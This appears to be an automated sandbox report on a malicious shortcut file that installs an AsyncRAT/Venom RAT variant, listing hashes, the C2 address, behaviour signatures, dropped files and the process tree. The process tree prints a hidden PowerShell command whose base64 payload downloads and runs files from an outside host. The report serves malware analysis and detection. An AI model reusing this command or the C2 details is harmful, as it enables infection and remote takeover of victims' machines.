Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    93s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12/07/2024, 06:04

General

  • Target

    0040de802062e7a83c6f785781873e9c78ec3fe70b8a3c7c3274fdce08b6a6c1.lnk

  • Size

    2KB

  • MD5

    7e7b20e421442d74655685583b4036de

  • SHA1

    cf936b1fe122c6a5029c07a64a0f8674b31464af

  • SHA256

    0040de802062e7a83c6f785781873e9c78ec3fe70b8a3c7c3274fdce08b6a6c1

  • SHA512

    e58df7f695e08bc57c30a518f35c84b9ab70597696d579291b12c2534a06b24018920cd09f4a0652dcca9791eca207646e4ce38f03bf3650c093a8db9ffe9318

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

64.112.85.3:4449

Mutex

ufaaryvntrlyhwcwq

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\0040de802062e7a83c6f785781873e9c78ec3fe70b8a3c7c3274fdce08b6a6c1.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1156
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -NoExit -Command "$avesqBoj49s = 'aXdyIC1VcmkgaHR0cHM6Ly9xdS5heC9PekZMLnBkZiAtT3V0RmlsZSAkZW52OlRFTVBcT25saW5lIEJhbmtpbmcgUGF5bWVudCBBZHZpY2UucGRmLnBkZjtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFxPbmxpbmUgQmFua2luZyBQYXltZW50IEFkdmljZS5wZGYucGRmO1N0YXJ0LVNsZWVwIC1zIDM7U3RhcnQtU2xlZXAgLXMgMztTdGFydC1TbGVlcCAtcyAzO2l3ciAtVXJpIGh0dHBzOi8vcXUuYXgvTnBsLmpzIC1PdXRGaWxlICRlbnY6VEVNUFxWeEl0RVQuanM7U3RhcnQtUHJvY2VzcyAkZW52OlRFTVBcVnhJdEVULmpzOyRhaD0nWWV4cjc0SFhXNkRpJztFeGl0';$EtRpa8h = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($avesqBoj49s));Invoke-Expression -Command $EtRpa8h"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4336
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\VxItET.js"
        3⤵
        • Checks computer location settings
        • Drops startup file
        • Suspicious use of WriteProcessMemory
        PID:532
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\UPDATE.ps1""
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2148
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\UPDATE.ps1"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4076
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:804

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    556084f2c6d459c116a69d6fedcc4105

    SHA1

    633e89b9a1e77942d822d14de6708430a3944dbc

    SHA256

    88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

    SHA512

    0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

  • C:\Users\Admin\AppData\Local\Temp\VxItET.js

    Filesize

    254KB

    MD5

    2ab59c5bd94c0fd78986c451fc0d649f

    SHA1

    3e58b73c0c7ec71ffeb6ab1a09a6d6b2f6717f46

    SHA256

    5f0cfa1a3d66bc1e0affb028ba335f5c89f0cb684b59933d0e55f6ed75efc075

    SHA512

    cfd9fd56e3503ba35f6b373df8cd725957641cb45b64f54aa0cd4d5eb3ede53d1dbc9f0965c635f1566686b8331356c239ab5242586473755e5b611517745b74

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4pyddalh.uca.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\UPDATE.ps1

    Filesize

    250KB

    MD5

    85a84eff8bf73e4661824726438e21ee

    SHA1

    a2b5401bbe15125c0d8d9419d87425366c991fa8

    SHA256

    78e20b9f9e36578c45d1c0e28e68299620ce085953ab3e468ab10f633e586cfc

    SHA512

    e93cb30222036ef2f47dc27cc3d4c6195e6c57d12728e4955707dba69d38b469a0e7242729cebe3d59afe312c3db5bdf20e623ea939ba7f8085d9435b14bcfb0

  • memory/804-48-0x0000000006360000-0x00000000063C6000-memory.dmp

    Filesize

    408KB

  • memory/804-47-0x00000000062C0000-0x000000000635C000-memory.dmp

    Filesize

    624KB

  • memory/804-46-0x00000000054A0000-0x00000000054AA000-memory.dmp

    Filesize

    40KB

  • memory/804-45-0x00000000054D0000-0x0000000005562000-memory.dmp

    Filesize

    584KB

  • memory/804-43-0x0000000005640000-0x0000000005BE4000-memory.dmp

    Filesize

    5.6MB

  • memory/804-42-0x00000000285E0000-0x00000000285F8000-memory.dmp

    Filesize

    96KB

  • memory/804-40-0x00000000285E0000-0x0000000028602000-memory.dmp

    Filesize

    136KB

  • memory/4076-39-0x0000021368870000-0x00000213688A4000-memory.dmp

    Filesize

    208KB

  • memory/4336-15-0x000002451E580000-0x000002451E5C4000-memory.dmp

    Filesize

    272KB

  • memory/4336-26-0x00007FFEE5760000-0x00007FFEE6221000-memory.dmp

    Filesize

    10.8MB

  • memory/4336-18-0x00007FFEE5760000-0x00007FFEE6221000-memory.dmp

    Filesize

    10.8MB

  • memory/4336-17-0x00007FFEE5760000-0x00007FFEE6221000-memory.dmp

    Filesize

    10.8MB

  • memory/4336-16-0x00007FFEE5760000-0x00007FFEE6221000-memory.dmp

    Filesize

    10.8MB

  • memory/4336-2-0x00007FFEE5763000-0x00007FFEE5765000-memory.dmp

    Filesize

    8KB

  • memory/4336-14-0x00007FFEE5760000-0x00007FFEE6221000-memory.dmp

    Filesize

    10.8MB

  • memory/4336-13-0x00007FFEE5760000-0x00007FFEE6221000-memory.dmp

    Filesize

    10.8MB

  • memory/4336-3-0x000002451C000000-0x000002451C022000-memory.dmp

    Filesize

    136KB